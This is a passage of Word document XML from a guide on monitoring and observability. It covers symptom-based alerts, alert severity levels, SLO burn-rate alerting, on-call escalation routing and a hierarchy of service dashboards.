    <w:p w14:paraId="08A557A1" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>GOOD (symptom-based):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1F7841" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Alert: "p99 latency &gt; 500ms for 5 minutes"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34553B5E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Problem: Users are experiencing slow responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D35240" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Result: Actionable — something is wrong that affects users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A073790" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EB991C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Then: INVESTIGATE the cause (could be CPU, could be DB, could be network).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465D7C25" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Dashboards show causes. Alerts trigger on symptoms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B708165" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Alert severity levels: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941"/>
        <w:gridCol w:w="3742"/>
        <w:gridCol w:w="2667"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="4750B0E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20C406" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A2456">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Severity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0D0D31" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A2456">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Criteria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C00A1D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A2456">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="5B96638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A095B7" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Page (wake someone up)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9C85F8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Users actively impacted, SLO burning fast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CC3191" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Immediate human response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="6CCCBE6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757322" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Ticket (next business day)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CEBC90" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Degradation detected but within SLO budget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24B8A8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Fix during work hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="4CDC1ED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B23AB0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Informational (log/dashboard)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821262" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Unusual but not impacting users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080608" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Investigate when convenient</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3399332B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 SLO-Based Alerting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174CD084" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E80DE6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>SLO: 99.9% of requests complete successfully within 500ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796A285D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Error budget: 0.1% = 43 minutes of downtime per month.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789B62B4" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="7C269B62" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Burn rate alert:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7023F283" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  "At the current error rate, the monthly error budget will be exhausted in &lt; 2 hours."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1B8BCB" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CEBC7D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Fast burn (page): 14.4x burn rate for 2 minutes → wakes someone up immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23220E22" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Slow burn (ticket): 3x burn rate for 6 hours → creates a ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C84F89A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44422C5F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t>Why this is better:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AD1F3D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - A brief 1-minute spike doesn't page anyone (budget can absorb it).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41944220" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - A sustained slow degradation DOES alert before the budget runs out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB98CBB" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Directly tied to user impact (SLO = user happiness metric).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C58CA3C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 Alert Routing and Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355333A5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F0FE3B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Alert fired: "Order service p99 &gt; 1s"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F560D9A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0354A391" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6113A440" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>┌─────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49911C65" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ AlertManager / PagerDuty            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFB23CF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6399A339" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ Route: service=order-service         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1817B88C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│   → Team: order-team                │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610F897B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│   → Primary on-call: Alice          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1A1D7C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│   → Channel: #order-alerts (Slack)  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E9E3CF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D533CC" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ Escalation:                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3930EA69" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│   0 min: Page Alice (SMS + push)    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249D8032" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│   5 min: No ACK → page Bob (backup) │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494BC93E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│   15 min: No ACK → page manager     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B742982" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32696633" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ Grouping:                            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108283AE" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│   Multiple alerts for same service   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0252D2" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│   → Group into one notification     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46302D5D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414911FE" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t>│ Silencing:                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B440282" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│   During planned maintenance         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2108C5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│   → Suppress known alerts            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5A5BB5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>└─────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7D2F8E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:pict w14:anchorId="2DE42686">
          <v:rect id="_x0000_i6134" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63963DB7" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Dashboards — Visualization for Humans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CA7B3C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Dashboard Design Principles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E679E7" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The hierarchy of dashboards:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDF42E0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F154872" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Level 1: Executive / Service Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E88F250" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  "Is everything OK?" — green/red, SLO compliance, error budget remaining.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C4CA0B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Audience: on-call, managers, anyone at a glance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6687DFCF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="05A203E9" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Level 2: Service Detail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337CB0DA" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  "How is THIS service performing?" — latency, throughput, errors, saturation per service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51995F4E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Audience: team owning the service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EA1173" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="45AC21A6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Level 3: Debug / Investigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7793B1F8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  "WHY is it broken?" — per-endpoint, per-pod, per-dependency breakdown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781F8109" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Audience: engineer actively debugging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA61F8B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="5F14F947" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Level 4: Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42ABF448" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  "Is the platform healthy?" — node CPU, memory, disk, network, Kubernetes state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C73FAD" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Audience: platform/SRE team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE2C1AA" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 The Service Overview Dashboard (Template)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552C6D39" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24671513" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t>┌──────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A04CED" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ Service: Order Service          SLO: 99.9% | Budget: 67% left│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB3DD77" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1843EF02" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                                                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0134CBDD" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  Request Rate          Error Rate           Latency (p50/p99)│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617D903C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  ┌──────────┐         ┌──────────┐        ┌──────────┐     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29133B6B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">│  │   </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📈</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">     │         │   </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📈</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">     │        │   </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📈</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">     │     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DB5335" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  │ 2.5k RPS │         │  0.02%   │        │ 12/89ms  │     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36140234" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  └──────────┘         └──────────┘        └──────────┘     │</w:t>
      </w:r>
    </w:p>
